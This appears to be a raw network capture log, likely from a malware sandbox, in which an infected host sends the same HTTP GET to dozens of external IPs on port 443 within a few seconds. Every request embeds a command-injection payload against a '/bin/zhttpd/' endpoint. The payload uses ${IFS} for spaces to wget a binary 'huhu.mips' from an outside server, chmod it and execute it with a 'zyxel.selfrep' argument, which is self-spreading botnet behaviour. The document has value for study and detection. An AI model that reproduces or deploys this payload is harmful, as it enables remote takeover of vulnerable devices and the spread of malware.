                                              Jan 29, 2024 07:03:59.186762094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6535192.168.2.143749848.73.202.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186788082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6536192.168.2.143695243.239.49.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186834097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6537192.168.2.144514479.185.216.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186858892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6538192.168.2.1433316208.11.32.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186892033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6539192.168.2.143508892.119.131.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186942101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6540192.168.2.143562263.160.20.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186978102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6541192.168.2.145017694.192.150.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187000036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6542192.168.2.144831453.63.170.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187035084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6543192.168.2.1443322167.176.199.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187077999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6544192.168.2.144009276.143.86.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187128067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6545192.168.2.1433710140.110.118.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187160969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6546192.168.2.1445890149.15.125.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187191963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6547192.168.2.1456440126.194.160.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187227964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6548192.168.2.1452850193.23.114.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187272072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6549192.168.2.143374046.213.38.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187299967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6550192.168.2.143515662.123.188.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187338114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6551192.168.2.1456948137.44.253.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187370062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6552192.168.2.145099283.151.209.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187423944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6553192.168.2.145527472.46.185.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187446117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6554192.168.2.1435400154.89.91.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187505960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6555192.168.2.146052035.243.204.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187535048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6556192.168.2.144300241.83.35.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187577963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6557192.168.2.1435200174.42.53.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187599897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6558192.168.2.1438694182.223.238.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187637091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6559192.168.2.1439186212.139.97.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187666893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6560192.168.2.1443836186.198.184.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187704086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6561192.168.2.144525040.167.52.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187724113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6562192.168.2.145268259.234.186.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187788963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6563192.168.2.1455276157.36.172.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187817097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6564192.168.2.1459266183.182.87.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187870026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6565192.168.2.146048479.223.134.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187908888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6566192.168.2.1441854138.184.211.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187947035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6567192.168.2.1439214162.157.235.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.187987089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6568192.168.2.1435482180.233.17.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188040972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6569192.168.2.1449094166.173.97.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188065052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6570192.168.2.143785634.123.166.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188098907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6571192.168.2.1438008141.78.57.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188133001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6572192.168.2.1433380105.78.227.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188191891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6573192.168.2.144135045.169.240.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188230991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6574192.168.2.1459228108.179.147.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188247919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6575192.168.2.144048684.155.164.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188303947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6576192.168.2.1443172151.200.96.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188342094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6577192.168.2.1452300130.143.36.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188374996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6578192.168.2.1458446155.177.71.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188431025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6579192.168.2.1440128102.138.78.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188452005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6580192.168.2.143548659.170.43.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188503981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6581192.168.2.1448328120.160.126.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188534021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6582192.168.2.145432658.186.48.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188559055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6583192.168.2.1454924207.38.170.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188587904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6584192.168.2.144273413.103.191.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188616037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6585192.168.2.1442010179.36.85.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188666105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6586192.168.2.144110876.125.175.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188698053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6587192.168.2.144002049.243.40.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188730001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6588192.168.2.144219817.75.193.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188764095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6589192.168.2.1444308148.134.158.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188790083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6590192.168.2.1449222109.2.204.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188846111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6591192.168.2.1440498169.202.1.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188874960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6592192.168.2.1447526193.232.37.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188909054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6593192.168.2.143925625.250.248.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.188972950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6594192.168.2.143665077.152.37.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189008951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6595192.168.2.143350847.20.78.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189038038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6596192.168.2.143433681.107.155.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189068079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6597192.168.2.1435192209.158.73.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189122915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6598192.168.2.143757295.202.115.122443
                                              TimestampBytes transferredDirectionData
